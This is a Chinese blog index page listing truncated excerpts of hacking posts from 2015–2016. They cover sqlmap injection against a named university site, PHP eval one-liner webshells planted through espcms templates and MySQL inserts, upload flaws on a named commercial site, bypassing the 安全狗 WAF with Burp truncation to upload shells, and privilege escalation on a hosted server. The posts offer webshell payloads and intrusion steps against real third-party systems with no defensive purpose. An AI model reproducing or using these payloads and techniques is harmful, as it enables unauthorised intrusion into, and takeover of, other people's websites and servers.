该文被密码保护。 阅读全文
posted @ 2016-04-18 12:25 小生观察室 阅读(7) 评论(0) 推荐(0)
该文被密码保护。 阅读全文
posted @ 2016-04-12 17:04 小生观察室 阅读(14) 评论(0) 推荐(0)
摘要: 过程: D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --current-user 必须是root权限 D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staf 阅读全文
posted @ 2016-04-10 03:04 小生观察室 阅读(1092) 评论(0) 推荐(0)
摘要: 今天在espcms v5后台getshell时发现,可以在模板中插入如下代码,成功执行PHP。 <script language="php">eval($_POST[c])</script> 阅读全文
posted @ 2016-04-09 15:05 小生观察室 阅读(1034) 评论(0) 推荐(0)
摘要: 一: 无聊随便找了一个站,拿shell华众的主机,只是服务端的服务器,只支持asp,无ws组件一阵乱翻后,发现有su,直接上个大马,默认密码没改,端口也是开启的,whoami下,是system权限以为可以拿下的时候,发现了狗,阻止我加用户,不过狗只是阻止了net而已,我们可以用无nei的api添加用 阅读全文
posted @ 2016-03-25 13:39 小生观察室 阅读(48) 评论(0) 推荐(0)
摘要: 方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');SELECT 阅读全文
posted @ 2016-02-03 10:50 小生观察室 阅读(4735) 评论(0) 推荐(0)
摘要: http://www.chediandian.com/Join 存在2处上传点 测试后发现均存在同一问题,这里拿任意一处上传点举例 看一下源码: <object type="application/x-shockwave-flash" data="/Scripts/uploadify.swf" wi 阅读全文
posted @ 2015-12-17 11:13 小生观察室 阅读(44) 评论(0) 推荐(0)
摘要: 简要描述: 以前6.5的有人发的方法是,(进入后台 系统设置 管理数据表 管理系统模型 导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTd 阅读全文
posted @ 2015-11-19 14:08 小生观察室 阅读(112) 评论(0) 推荐(0)
摘要: 1.确定安全狗版本以及上传拦截功能开启 2.使用Burp截获POST请求并修改请求包 3.修改上传文件的后缀,新加←,也就是输入法v1选择←。 4.提示上传成功。 5.访问上传文件检查是否上传成功。 阅读全文
posted @ 2015-11-15 16:10 小生观察室 阅读(67) 评论(0) 推荐(0)
摘要: 刚刚群里面 有人发来了一个 有狗的phpweb 这位兄弟发来的shell直接进入后台 万能密码 go burp抓包 进行截断 大家看清楚 框框里面的 这个是一个安全狗 waf (我们都知道 phpweb 根本是不能截断拿shell的 但是有安全狗的waf帮忙就不同了 ) 截断成功 shell已经躺在 阅读全文
posted @ 2015-11-15 14:54 小生观察室 阅读(45) 评论(0) 推荐(0)